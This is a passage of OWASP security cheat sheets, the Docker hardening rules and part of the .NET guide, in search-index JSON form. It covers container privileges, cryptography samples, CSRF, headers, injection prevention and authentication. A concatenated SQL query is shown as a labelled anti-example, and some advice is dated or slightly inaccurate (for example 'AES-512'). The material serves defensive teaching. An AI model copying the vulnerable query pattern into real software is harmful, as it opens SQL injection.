"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-2-set-a-user","title":"RULE #2 - Set a user","text":"

Configuring the container to use an unprivileged user is the best way to prevent privilege escalation attacks. This can be accomplished in three different ways as follows:

  1. During runtime using -u option of docker run command e.g.:

    docker run -u 4000 alpine\n
  2. During build time. Simple add user in Dockerfile and use it. For example:

    FROM alpine\nRUN groupadd -r myuser && useradd -r -g myuser myuser\n<HERE DO WHAT YOU HAVE TO DO AS A ROOT USER LIKE INSTALLING PACKAGES ETC.>\nUSER myuser\n
  3. Enable user namespace support (--userns-remap=default) in Docker daemon

More information about this topic can be found at Docker official documentation

In kubernetes, this can be configured in Security Context using runAsNonRoot field e.g.:

kind: ...\napiVersion: ...\nmetadata:\nname: ...\nspec:\n...\ncontainers:\n- name: ...\nimage: ....\nsecurityContext:\n...\nrunAsNonRoot: true\n...\n

As a Kubernetes cluster administrator, you can configure it using Pod Security Policies.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-3-limit-capabilities-grant-only-specific-capabilities-needed-by-a-container","title":"RULE #3 - Limit capabilities (Grant only specific capabilities, needed by a container)","text":"

Linux kernel capabilities are a set of privileges that can be used by privileged. Docker, by default, runs with only a subset of capabilities. You can change it and drop some capabilities (using --cap-drop) to harden your docker containers, or add some capabilities (using --cap-add) if needed. Remember not to run containers with the --privileged flag - this will add ALL Linux kernel capabilities to the container.

The most secure setup is to drop all capabilities --cap-drop all and then add only required ones. For example:

docker run --cap-drop all --cap-add CHOWN alpine\n

And remember: Do not run containers with the --privileged flag!!!

In kubernetes this can be configured in Security Context using capabilities field e.g.:

kind: ...\napiVersion: ...\nmetadata:\nname: ...\nspec:\n...\ncontainers:\n- name: ...\nimage: ....\nsecurityContext:\n...\ncapabilities:\ndrop:\n- all\nadd:\n- CHOWN\n...\n

As a Kubernetes cluster administrator, you can configure it using Pod Security Policies.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-4-add-no-new-privileges-flag","title":"RULE #4 - Add \u2013no-new-privileges flag","text":"

Always run your docker images with --security-opt=no-new-privileges in order to prevent escalate privileges using setuid or setgid binaries.

In kubernetes, this can be configured in Security Context using allowPrivilegeEscalation field e.g.:

kind: ...\napiVersion: ...\nmetadata:\nname: ...\nspec:\n...\ncontainers:\n- name: ...\nimage: ....\nsecurityContext:\n...\nallowPrivilegeEscalation: false\n...\n

As a Kubernetes cluster administrator, you can refer to Kubernetes documentation to configure it using Pod Security Policies.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-5-disable-inter-container-communication-iccfalse","title":"RULE #5 - Disable inter-container communication (--icc=false)","text":"

By default inter-container communication (icc) is enabled - it means that all containers can talk with each other (using docker0 bridged network). This can be disabled by running docker daemon with --icc=false flag. If icc is disabled (icc=false) it is required to tell which containers can communicate using --link=CONTAINER_NAME_or_ID:ALIAS option. See more in Docker documentation - container communication

In Kubernetes Network Policies can be used for it.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-6-use-linux-security-module-seccomp-apparmor-or-selinux","title":"RULE #6 - Use Linux Security Module (seccomp, AppArmor, or SELinux)","text":"

First of all, do not disable default security profile!

Consider using security profile like seccomp or AppArmor.

Instructions how to do this inside Kubernetes can be found at Security Context documentation and in Kubernetes API documentation

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-7-limit-resources-memory-cpu-file-descriptors-processes-restarts","title":"RULE #7 - Limit resources (memory, CPU, file descriptors, processes, restarts)","text":"

The best way to avoid DoS attacks is by limiting resources. You can limit memory, CPU, maximum number of restarts (--restart=on-failure:<number_of_restarts>), maximum number of file descriptors (--ulimit nofile=<number>) and maximum number of processes (--ulimit nproc=<number>).

Check documentation for more details about ulimits

You can also do this inside Kubernetes: Assign Memory Resources to Containers and Pods, Assign CPU Resources to Containers and Pods and Assign Extended Resources to a Container

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-8-set-filesystem-and-volumes-to-read-only","title":"RULE #8 - Set filesystem and volumes to read-only","text":"

Run containers with a read-only filesystem using --read-only flag. For example:

docker run --read-only alpine sh -c 'echo \"whatever\" > /tmp'\n

If an application inside a container has to save something temporarily, combine --read-only flag with --tmpfs like this:

docker run --read-only --tmpfs /tmp alpine sh -c 'echo \"whatever\" > /tmp/file'\n

Equivalent in the docker-compose file will be:

version: \"3\"\nservices:\nalpine:\nimage: alpine\nread_only: true\n

Equivalent in kubernetes in Security Context will be:

kind: ...\napiVersion: ...\nmetadata:\nname: ...\nspec:\n...\ncontainers:\n- name: ...\nimage: ....\nsecurityContext:\n...\nreadOnlyRootFilesystem: true\n...\n

In addition, if the volume is mounted only for reading mount them as a read-only It can be done by appending :ro to the -v like this:

docker run -v volume-name:/path/in/container:ro alpine\n

Or by using --mount option:

docker run --mount source=volume-name,destination=/path/in/container,readonly alpine\n
"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-9-use-static-analysis-tools","title":"RULE #9 - Use static analysis tools","text":"

To detect containers with known vulnerabilities - scan images using static analysis tools.

To detect secrets in images:

To detect misconfigurations in Kubernetes:

To detect misconfigurations in Docker:

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-10-set-the-logging-level-to-at-least-info","title":"RULE #10 - Set the logging level to at least INFO","text":"

By default, the Docker daemon is configured to have a base logging level of 'info', and if this is not the case: set the Docker daemon log level to 'info'. Rationale: Setting up an appropriate log level, configures the Docker daemon to log events that you would want to review later. A base log level of 'info' and above would capture all logs except the debug logs. Until and unless required, you should not run docker daemon at the 'debug' log level.

To configure the log level in docker-compose:

docker-compose --log-level info up\n
"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-11-lint-the-dockerfile-at-build-time","title":"Rule #11 - Lint the Dockerfile at build time","text":"

Many issues can be prevented by following some best practices when writing the Dockerfile. Adding a security linter as a step in the build pipeline can go a long way in avoiding further headaches. Some issues that are worth checking are:

References:

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-12-run-docker-in-root-less-mode","title":"Rule #12 - Run Docker in root-less mode","text":"

Rootless mode ensures that the Docker daemon and containers are running as an unprivileged user, which means that even if an attacker breaks out of the container, they will not have root privileges on the host, which in turn substantially limits the attack surface.

Rootless mode graduated from experimental in Docker Engine v20.10 and should be considered for added security, provided the known limitations are not an impediment.

Rootless mode allows running the Docker daemon and containers as a non-root user to mitigate potential vulnerabilities in the daemon and the container runtime. Rootless mode does not require root privileges even during the installation of the Docker daemon, as long as the prerequisites are met. Rootless mode was introduced in Docker Engine v19.03 as an experimental feature. Rootless mode graduated from experimental in Docker Engine v20.10.

Read more about rootless mode and its limitations, installation and usage instructions on Docker documentation page.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#related-projects","title":"Related Projects","text":"

OWASP Docker Top 10

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html","title":"DotNet Security Cheat Sheet","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This page intends to provide quick basic .NET security tips for developers.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#the-net-framework","title":"The .NET Framework","text":"

The .NET Framework is Microsoft's principal platform for enterprise development. It is the supporting API for ASP.NET, Windows Desktop applications, Windows Communication Foundation services, SharePoint, Visual Studio Tools for Office and other technologies.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#updating-the-framework","title":"Updating the Framework","text":"

The .NET Framework is kept up-to-date by Microsoft with the Windows Update service. Developers do not normally need to run separate updates to the Framework. Windows Update can be accessed at Windows Update or from the Windows Update program on a Windows computer.

Individual frameworks can be kept up to date using NuGet. As Visual Studio prompts for updates, build it into your lifecycle.

Remember that third-party libraries have to be updated separately and not all of them use NuGet. ELMAH for instance, requires a separate update effort.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#security-announcements","title":"Security Announcements","text":"

Receive security notifications by selecting the \"Watch\" button at the following repositories:

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#net-framework-guidance","title":".NET Framework Guidance","text":"

The .NET Framework is the set of APIs that support an advanced type system, data, graphics, network, file handling and most of the rest of what is needed to write enterprise apps in the Microsoft ecosystem. It is a nearly ubiquitous library that is strongly named and versioned at the assembly level.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#data-access","title":"Data Access","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#cryptography","title":"Cryptography","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#general-cryptography-guidance","title":"General cryptography guidance","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#encryption-for-storage","title":"Encryption for storage","text":"

The following code snippet shows an example of using AES-GCM to perform encryption/decryption of data. It is strongly recommended to have a cryptography expert review your final design and code, as even the most trivial error can severely weaken your encryption.

The code is based on example from here: https://www.scottbrady91.com/c-sharp/aes-gcm-dotnet

A few constraints/pitfalls with this code:

Click here to view the \"AES-GCM symmetric encryption\" code snippet.
// Code based on example from here:\n// https://www.scottbrady91.com/c-sharp/aes-gcm-dotnet\n\npublic class AesGcmSimpleTest\n{\npublic static void Main()\n{\n\n// Key of 32 bytes / 256 bits for AES\nvar key = new byte[32];\nRandomNumberGenerator.Fill(key);\n\n// MaxSize = 12 bytes / 96 bits and this size should always be used.\nvar nonce = new byte[AesGcm.NonceByteSizes.MaxSize];\nRandomNumberGenerator.Fill(nonce);\n\n// Tag for authenticated encryption\nvar tag = new byte[AesGcm.TagByteSizes.MaxSize];\n\nvar message = \"This message to be encrypted\";\nConsole.WriteLine(message);\n\n// Encrypt the message\nvar cipherText = AesGcmSimple.Encrypt(message, nonce, out tag, key);\nConsole.WriteLine(Convert.ToBase64String(cipherText));\n\n// Decrypt the message\nvar message2 = AesGcmSimple.Decrypt(cipherText, nonce, tag, key);\nConsole.WriteLine(message2);\n\n\n}\n}\n\n\npublic static class AesGcmSimple\n{\n\npublic static byte[] Encrypt(string plaintext, byte[] nonce, out byte[] tag, byte[] key)\n{\nusing(var aes = new AesGcm(key))\n{\n// Tag for authenticated encryption\ntag = new byte[AesGcm.TagByteSizes.MaxSize];\n\n// Create a byte array from the message to encrypt\nvar plaintextBytes = Encoding.UTF8.GetBytes(plaintext);\n\n// Ciphertext will be same length in bytes as plaintext \nvar ciphertext = new byte[plaintextBytes.Length];\n\n// perform the actual encryption\naes.Encrypt(nonce, plaintextBytes, ciphertext, tag);\nreturn ciphertext;\n}\n}\n\npublic static string Decrypt(byte[] ciphertext, byte[] nonce, byte[] tag, byte[] key)\n{\nusing(var aes = new AesGcm(key))\n{\n// Plaintext will be same length in bytes as Ciphertext \nvar plaintextBytes = new byte[ciphertext.Length];\n\n// perform the actual decryption\naes.Decrypt(nonce, ciphertext, tag, plaintextBytes);\n\nreturn Encoding.UTF8.GetString(plaintextBytes);\n}\n}\n}\n
"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#encryption-for-transmission","title":"Encryption for transmission","text":"

The following code snippet shows an example of using Eliptic Curve/Diffie Helman (ECDH) together with AES-GCM to perform encryption/decryption of data between two different sides without the need the transfer the symmetric key between the two sides. Instead, the sides exchange public keys and can then use ECDH to generate a shared secret which can be used for the symmetric encryption.

Again, it is strongly recommended to have a cryptography expert review your final design and code, as even the most trivial error can severely weaken your encryption.

Note that this code sample relies on the AesGcmSimple class from the previous section.

A few constraints/pitfalls with this code:

Click here to view the \"ECDH asymmetric encryption\" code snippet.
public class ECDHSimpleTest\n{\npublic static void Main()\n{\n// Generate ECC key pair for Alice\nvar alice = new ECDHSimple();\nbyte[] alicePublicKey = alice.PublicKey;\n\n// Generate ECC key pair for Bob\nvar bob = new ECDHSimple();\nbyte[] bobPublicKey = bob.PublicKey;\n\nstring plaintext = \"Hello, Bob! How are you?\";\nConsole.WriteLine(\"Secret being sent from Alice to Bob: \" + plaintext);\n\n// Note that a new nonce is generated with every encryption operation in line with\n// in line with the AES GCM security \nbyte[] tag;\nbyte[] nonce;\nvar cipherText = alice.Encrypt(bobPublicKey, plaintext, out nonce, out tag);\nConsole.WriteLine(\"Ciphertext, nonce, and tag being sent from Alice to Bob: \" + Convert.ToBase64String(cipherText) + \" \" + Convert.ToBase64String(nonce) + \" \" + Convert.ToBase64String(tag));\n\nvar decrypted = bob.Decrypt(alicePublicKey, cipherText, nonce, tag);\nConsole.WriteLine(\"Secret received by Bob from Alice: \" + decrypted);\n\nConsole.WriteLine();\n\nstring plaintext2 = \"Hello, Alice! I'm good, how are you?\";\nConsole.WriteLine(\"Secret being sent from Bob to Alice: \" + plaintext2);\n\nbyte[] tag2;\nbyte[] nonce2;\nvar cipherText2 = bob.Encrypt(alicePublicKey, plaintext2, out nonce2, out tag2);\nConsole.WriteLine(\"Ciphertext, nonce, and tag being sent from Bob to Alice: \" + Convert.ToBase64String(cipherText2) + \" \" + Convert.ToBase64String(nonce2) + \" \" + Convert.ToBase64String(tag2));\n\nvar decrypted2 = alice.Decrypt(bobPublicKey, cipherText2, nonce2, tag2);\nConsole.WriteLine(\"Secret received by Alice from Bob: \" + decrypted2);\n}\n}\n\n\npublic class ECDHSimple\n{\n\nprivate ECDiffieHellmanCng ecdh = new ECDiffieHellmanCng();\n\npublic byte[] PublicKey\n{\nget\n{\nreturn ecdh.PublicKey.ToByteArray();\n}\n}\n\npublic byte[] Encrypt(byte[] partnerPublicKey, string message, out byte[] nonce, out byte[] tag)\n{\n// Generate the AES Key and Nonce\nvar aesKey = GenerateAESKey(partnerPublicKey);\n\n// Tag for authenticated encryption\ntag = new byte[AesGcm.TagByteSizes.MaxSize];\n\n// MaxSize = 12 bytes / 96 bits and this size should always be used.\n// A new nonce is generated with every encryption operation in line with\n// the AES GCM security model\nnonce = new byte[AesGcm.NonceByteSizes.MaxSize];\nRandomNumberGenerator.Fill(nonce);\n\n// return the encrypted value\nreturn AesGcmSimple.Encrypt(message, nonce, out tag, aesKey);\n}\n\n\npublic string Decrypt(byte[] partnerPublicKey, byte[] ciphertext, byte[] nonce, byte[] tag)\n{\n// Generate the AES Key and Nonce\nvar aesKey = GenerateAESKey(partnerPublicKey);\n\n// return the decrypted value\nreturn AesGcmSimple.Decrypt(ciphertext, nonce, tag, aesKey);\n}\n\nprivate byte[] GenerateAESKey(byte[] partnerPublicKey)\n{\n// Derive the secret based on this side's private key and the other side's public key \nbyte[] secret = ecdh.DeriveKeyMaterial(CngKey.Import(partnerPublicKey, CngKeyBlobFormat.EccPublicBlob));\n\nbyte[] aesKey = new byte[32]; // 256-bit AES key\nArray.Copy(secret, 0, aesKey, 0, 32); // Copy first 32 bytes as the key\n\nreturn aesKey;\n}\n}\n
"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#hashing","title":"Hashing","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#general","title":"General","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#asp-net-web-forms-guidance","title":"ASP NET Web Forms Guidance","text":"

ASP.NET Web Forms is the original browser-based application development API for the .NET framework, and is still the most common enterprise platform for web application development.

protected\u00a0override\u00a0OnInit(EventArgs\u00a0e)\u00a0{\nbase.OnInit(e);\nViewStateUserKey\u00a0=\u00a0Session.SessionID;\n}\n

If you don't use Viewstate, then look to the default master page of the ASP.NET Web Forms default template for a manual anti-CSRF token using a double-submit cookie.

private\u00a0const\u00a0string\u00a0AntiXsrfTokenKey\u00a0=\u00a0\"__AntiXsrfToken\";\nprivate\u00a0const\u00a0string\u00a0AntiXsrfUserNameKey\u00a0=\u00a0\"__AntiXsrfUserName\";\nprivate\u00a0string\u00a0_antiXsrfTokenValue;\nprotected\u00a0void\u00a0Page_Init(object\u00a0sender,\u00a0EventArgs\u00a0e)\n{\n//\u00a0The\u00a0code\u00a0below\u00a0helps\u00a0to\u00a0protect\u00a0against\u00a0XSRF\u00a0attacks\nvar\u00a0requestCookie\u00a0=\u00a0Request.Cookies[AntiXsrfTokenKey];\nGuid\u00a0requestCookieGuidValue;\nif\u00a0(requestCookie\u00a0!=\u00a0null\u00a0&&\u00a0Guid.TryParse(requestCookie.Value,\u00a0out\u00a0requestCookieGuidValue))\n{\n//\u00a0Use\u00a0the\u00a0Anti-XSRF\u00a0token\u00a0from\u00a0the\u00a0cookie\n_antiXsrfTokenValue\u00a0=\u00a0requestCookie.Value;\nPage.ViewStateUserKey\u00a0=\u00a0_antiXsrfTokenValue;\n}\nelse\n{\n//\u00a0Generate\u00a0a\u00a0new\u00a0Anti-XSRF\u00a0token\u00a0and\u00a0save\u00a0to\u00a0the\u00a0cookie\n_antiXsrfTokenValue\u00a0=\u00a0Guid.NewGuid().ToString(\"N\");\nPage.ViewStateUserKey\u00a0=\u00a0_antiXsrfTokenValue;\nvar\u00a0responseCookie\u00a0=\u00a0new\u00a0HttpCookie(AntiXsrfTokenKey)\n{\nHttpOnly\u00a0=\u00a0true,\nValue\u00a0=\u00a0_antiXsrfTokenValue\n};\nif\u00a0(FormsAuthentication.RequireSSL\u00a0&&\u00a0Request.IsSecureConnection)\n{\nresponseCookie.Secure\u00a0=\u00a0true;\n}\nResponse.Cookies.Set(responseCookie);\n}\nPage.PreLoad\u00a0+=\u00a0master_Page_PreLoad;\n}\nprotected\u00a0void\u00a0master_Page_PreLoad(object\u00a0sender,\u00a0EventArgs\u00a0e)\n{\nif\u00a0(!IsPostBack)\n{\n//\u00a0Set\u00a0Anti-XSRF\u00a0token\nViewState[AntiXsrfTokenKey]\u00a0=\u00a0Page.ViewStateUserKey;\nViewState[AntiXsrfUserNameKey]\u00a0=\u00a0Context.User.Identity.Name\u00a0??\u00a0String.Empty;\n}\nelse\n{\n//\u00a0Validate\u00a0the\u00a0Anti-XSRF\u00a0token\nif ((string)ViewState[AntiXsrfTokenKey] != _antiXsrfTokenValue ||\n(string)ViewState[AntiXsrfUserNameKey]\u00a0!=\u00a0(Context.User.Identity.Name\u00a0??\u00a0String.Empty))\n{\nthrow\u00a0new\u00a0InvalidOperationException(\"Validation\u00a0of\u00a0Anti-XSRF\u00a0token\u00a0failed.\");\n}\n}\n}\n
<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<configuration>\n<system.web>\n<httpRuntime enableVersionHeader=\"false\"/>\n</system.web>\n<system.webServer>\n<security>\n<requestFiltering removeServerHeader=\"true\" />\n</security>\n<staticContent>\n<clientCache cacheControlCustom=\"public\"\ncacheControlMode=\"UseMaxAge\"\ncacheControlMaxAge=\"1.00:00:00\"\nsetEtag=\"true\" />\n</staticContent>\n<httpProtocol>\n<customHeaders>\n<add name=\"Content-Security-Policy\"\nvalue=\"default-src 'none'; style-src 'self'; img-src 'self'; font-src 'self'\" />\n<add name=\"X-Content-Type-Options\" value=\"NOSNIFF\" />\n<add name=\"X-Frame-Options\" value=\"DENY\" />\n<add name=\"X-Permitted-Cross-Domain-Policies\" value=\"master-only\"/>\n<add name=\"X-XSS-Protection\" value=\"0\"/>\n<remove name=\"X-Powered-By\"/>\n</customHeaders>\n</httpProtocol>\n<rewrite>\n<rules>\n<rule name=\"Redirect to https\">\n<match url=\"(.*)\"/>\n<conditions>\n<add input=\"{HTTPS}\" pattern=\"Off\"/>\n<add input=\"{REQUEST_METHOD}\" pattern=\"^get$|^head$\" />\n</conditions>\n<action type=\"Redirect\" url=\"https://{HTTP_HOST}/{R:1}\" redirectType=\"Permanent\"/>\n</rule>\n</rules>\n<outboundRules>\n<rule name=\"Add HSTS Header\" enabled=\"true\">\n<match serverVariable=\"RESPONSE_Strict_Transport_Security\" pattern=\".*\" />\n<conditions>\n<add input=\"{HTTPS}\" pattern=\"on\" ignoreCase=\"true\" />\n</conditions>\n<action type=\"Rewrite\" value=\"max-age=15768000\" />\n</rule>\n</outboundRules>\n</rewrite>\n</system.webServer>\n</configuration>\n
<httpRuntime enableVersionHeader=\"false\" />\n
HttpContext.Current.Response.Headers.Remove(\"Server\");\n
"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#http-validation-and-encoding","title":"HTTP validation and encoding","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#forms-authentication","title":"Forms authentication","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#asp-net-mvc-guidance","title":"ASP NET MVC Guidance","text":"

ASP.NET MVC (Model\u2013View\u2013Controller) is a contemporary web application framework that uses more standardized HTTP communication than the Web Forms postback model.

The OWASP Top 10 2017 lists the most prevalent and dangerous threats to web security in the world today and is reviewed every 3 years.

This section is based on this. Your approach to securing your web application should be to start at the top threat A1 below and work down, this will ensure that any time spent on security will be spent most effectively spent and cover the top threats first and lesser threats afterwards. After covering the top 10 it is generally advisable to assess for other threats or get a professionally completed Penetration Test.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a1-injection","title":"A1 Injection","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#sql-injection","title":"SQL Injection","text":"

DO: Using an object relational mapper (ORM) or stored procedures is the most effective way of countering the SQL Injection vulnerability.

DO: Use parameterized queries where a direct sql query must be used. More Information can be found here.

e.g. In entity frameworks:

var\u00a0sql\u00a0=\u00a0@\"Update\u00a0[User]\u00a0SET\u00a0FirstName\u00a0=\u00a0@FirstName\u00a0WHERE\u00a0Id\u00a0=\u00a0@Id\";\ncontext.Database.ExecuteSqlCommand(\nsql,\nnew\u00a0SqlParameter(\"@FirstName\",\u00a0firstname),\nnew\u00a0SqlParameter(\"@Id\",\u00a0id));\n

DO NOT: Concatenate strings anywhere in your code and execute them against your database (Known as dynamic sql).

NB: You can still accidentally do this with ORMs or Stored procedures so check everywhere.

e.g

string\u00a0strQry\u00a0=\u00a0\"SELECT\u00a0*\u00a0FROM\u00a0Users\u00a0WHERE\u00a0UserName='\"\u00a0+\u00a0txtUser.Text\u00a0+\u00a0\"'\u00a0AND\u00a0Password='\"\n+\u00a0txtPassword.Text\u00a0+\u00a0\"'\";\nEXEC\u00a0strQry\u00a0//\u00a0SQL\u00a0Injection\u00a0vulnerability!\n

DO: Practice Least Privilege - Connect to the database using an account with a minimum set of permissions required to do it's job i.e. not the sa account

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#os-injection","title":"OS Injection","text":"

General guidance about OS Injection can be found on this cheat sheet.

DO: Use System.Diagnostics.Process.Start to call underlying OS functions.

e.g

var process = new System.Diagnostics.Process();\nvar startInfo = new System.Diagnostics.ProcessStartInfo();\nstartInfo.FileName = \"validatedCommand\";\nstartInfo.Arguments = \"validatedArg1 validatedArg2 validatedArg3\";\nprocess.StartInfo = startInfo;\nprocess.Start();\n

DO NOT: Assume that this mechanism will protect against malicious input designed to break out of one argument and then tamper with another argument to the process. This will still be possible.

DO: Use allow-list validation on all user supplied input wherever possible. Input validation prevents improperly formed data from entering an information system. For more information please see the Input Validation Cheat Sheet.

e.g Validating user input using IPAddress.TryParse Method

//User input\nstring ipAddress = \"127.0.0.1\";\n\n//check to make sure an ip address was provided\nif (!string.IsNullOrEmpty(ipAddress))\n{\n// Create an instance of IPAddress for the specified address string (in\n// dotted-quad, or colon-hexadecimal notation).\nif (IPAddress.TryParse(ipAddress, out var address))\n{\n// Display the address in standard notation.\nreturn address.ToString();\n}\nelse\n{\n//ipAddress is not of type IPAddress\n...\n}\n...\n}\n

DO: Try to only accept characters which are simple alphanumeric.

DO NOT: Assume you can sanitize special characters without actually removing them. Various combinations of \\, ' and @ may have an unexpected impact on sanitization attempts.

DO NOT: Rely on methods without a security guarantee.

e.g. .NET Core 2.2 and greater and .NET 5 and greater support ProcessStartInfo.ArgumentList which performs some character escaping but the object includes a disclaimer that it is not safe with untrusted input.

DO: Look at alternatives to passing raw untrusted arguments via command-line parameters such as encoding using Base64 (which would safely encode any special characters as well) and then decode the parameters in the receiving application.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#ldap-injection","title":"LDAP injection","text":"

Almost any characters can be used in Distinguished Names. However, some must be escaped with the backslash \\ escape character. A table showing which characters that should be escaped for Active Directory can be found at the in the LDAP Injection Prevention Cheat Sheet.

NB: The space character must be escaped only if it is the leading or trailing character in a component name, such as a Common Name. Embedded spaces should not be escaped.

More information can be found here.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a2-broken-authentication","title":"A2 Broken Authentication","text":"

DO: Use ASP.net Core Identity. ASP.net Core Identity framework is well configured by default, where it uses secure password hashes and an individual salt. Identity uses the PBKDF2 hashing function for passwords, and they generate a random salt per user.

DO: Set secure password policy

e.g ASP.net Core Identity

//startup.cs\nservices.Configure<IdentityOptions>(options =>\n{\n// Password settings\noptions.Password.RequireDigit = true;\noptions.Password.RequiredLength = 8;\noptions.Password.RequireNonAlphanumeric = true;\noptions.Password.RequireUppercase = true;\noptions.Password.RequireLowercase = true;\noptions.Password.RequiredUniqueChars = 6;\n\n\noptions.Lockout.DefaultLockoutTimeSpan = TimeSpan.FromMinutes(30);\noptions.Lockout.MaxFailedAccessAttempts = 3;\n\noptions.SignIn.RequireConfirmedEmail = true;\n\noptions.User.RequireUniqueEmail = true;\n});\n

DO: Set a cookie policy

e.g

//startup.cs\nservices.ConfigureApplicationCookie(options =>\n{\noptions.Cookie.HttpOnly = true;\noptions.Cookie.Expiration = TimeSpan.FromHours(1)\noptions.SlidingExpiration = true;\n});\n
"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a3-sensitive-data-exposure","title":"A3 Sensitive Data Exposure","text":"

DO NOT: Store encrypted passwords.

DO: Use a strong hash to store password credentials. For hash refer to this section.

DO: Enforce passwords with a minimum complexity that will survive a dictionary attack i.e. longer passwords that use the full character set (numbers, symbols and letters) to increase the entropy.

DO: Use a strong encryption routine such as AES-512 where personally identifiable data needs to be restored to it's original format. Protect encryption keys more than any other asset, please find more information of storing encryption keys at rest. Apply the following test: Would you be happy leaving the data on a spreadsheet on a bus for everyone to read. Assume the attacker can get direct access to your database and protect it accordingly. More information can be found here.

DO: Use TLS 1.2 for your entire site. Get a free certificate LetsEncrypt.org.

DO NOT: Allow SSL, this is now obsolete.

DO: Have a strong TLS policy (see SSL Best Practices), use TLS 1.2 wherever possible. Then check the configuration using SSL Test or TestSSL.

DO: Ensure headers are not disclosing information about your application. See HttpHeaders.cs , Dionach StripHeaders, disable via web.config or startup.cs:

More information on Transport Layer Protection can be found here. e.g Web.config

<system.web>\n<httpRuntime enableVersionHeader=\"false\"/>\n</system.web>\n<system.webServer>\n<security>\n<requestFiltering removeServerHeader=\"true\" />\n</security>\n<httpProtocol>\n<customHeaders>\n<add name=\"X-Content-Type-Options\" value=\"nosniff\" />\n<add name=\"X-Frame-Options\" value=\"DENY\" />\n<add name=\"X-Permitted-Cross-Domain-Policies\" value=\"master-only\"/>\n<add name=\"X-XSS-Protection\" value=\"0\"/>\n<remove name=\"X-Powered-By\"/>\n</customHeaders>\n</httpProtocol>\n</system.webServer>\n

e.g Startup.cs

app.UseHsts(hsts => hsts.MaxAge(365).IncludeSubdomains());\napp.UseXContentTypeOptions();\napp.UseReferrerPolicy(opts => opts.NoReferrer());\napp.UseXXssProtection(options => options.FilterDisabled());\napp.UseXfo(options => options.Deny());\n\napp.UseCsp(opts => opts\n.BlockAllMixedContent()\n.StyleSources(s => s.Self())\n.StyleSources(s => s.UnsafeInline())\n.FontSources(s => s.Self())\n.FormActions(s => s.Self())\n.FrameAncestors(s => s.Self())\n.ImageSources(s => s.Self())\n.ScriptSources(s => s.Self())\n);\n

For more information about headers can be found here.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a4-xml-external-entities-xxe","title":"A4 XML External Entities (XXE)","text":"

XXE attacks occur when an XML parse does not properly process user input that contains external entity declaration in the doctype of an XML payload.

This article discusses the most common XML Processing Options for .NET.

Please refer to the XXE cheat sheet for more detailed information on preventing XXE and other XML Denial of Service attacks.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a5-broken-access-control","title":"A5 Broken Access Control","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#weak-account-management","title":"Weak Account management","text":"

Ensure cookies are sent via httpOnly:

CookieHttpOnly\u00a0=\u00a0true,\n

Reduce the time period a session can be stolen in by reducing session timeout and removing sliding expiration:

ExpireTimeSpan\u00a0=\u00a0TimeSpan.FromMinutes(60),\nSlidingExpiration\u00a0=\u00a0false\n

See here for full startup code snippet

Ensure cookie is sent over HTTPS in the production environment. This should be enforced in the config transforms:

<httpCookies requireSSL=\"true\" xdt:Transform=\"SetAttributes(requireSSL)\"/>\n<authentication>\n<forms requireSSL=\"true\" xdt:Transform=\"SetAttributes(requireSSL)\"/>\n</authentication>\n

Protect LogOn, Registration and password reset methods against brute force attacks by throttling requests (see code below), consider also using ReCaptcha.

[HttpPost]\n[AllowAnonymous]\n[ValidateAntiForgeryToken]\n[AllowXRequestsEveryXSecondsAttribute(Name = \"LogOn\",\nMessage = \"You have performed this action more than {x} times in the last {n} seconds.\",\nRequests = 3, Seconds = 60)]\npublic\u00a0async\u00a0Task<ActionResult>\u00a0LogOn(LogOnViewModel\u00a0model,\u00a0string\u00a0returnUrl)\n

DO NOT: Roll your own authentication or session management, use the one provided by .Net

DO NOT: Tell someone if the account exists on LogOn, Registration or Password reset. Say something like 'Either the username or password was incorrect', or 'If this account exists then a reset token will be sent to the registered email address'. This protects against account enumeration.

The feedback to the user should be identical whether or not the account exists, both in terms of content and behavior: e.g. if the response takes 50% longer when the account is real then membership information can be guessed and tested.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#missing-function-level-access-control","title":"Missing function-level access control","text":"

DO: Authorize users on all externally facing endpoints. The .NET framework has many ways to authorize a user, use them at method level:

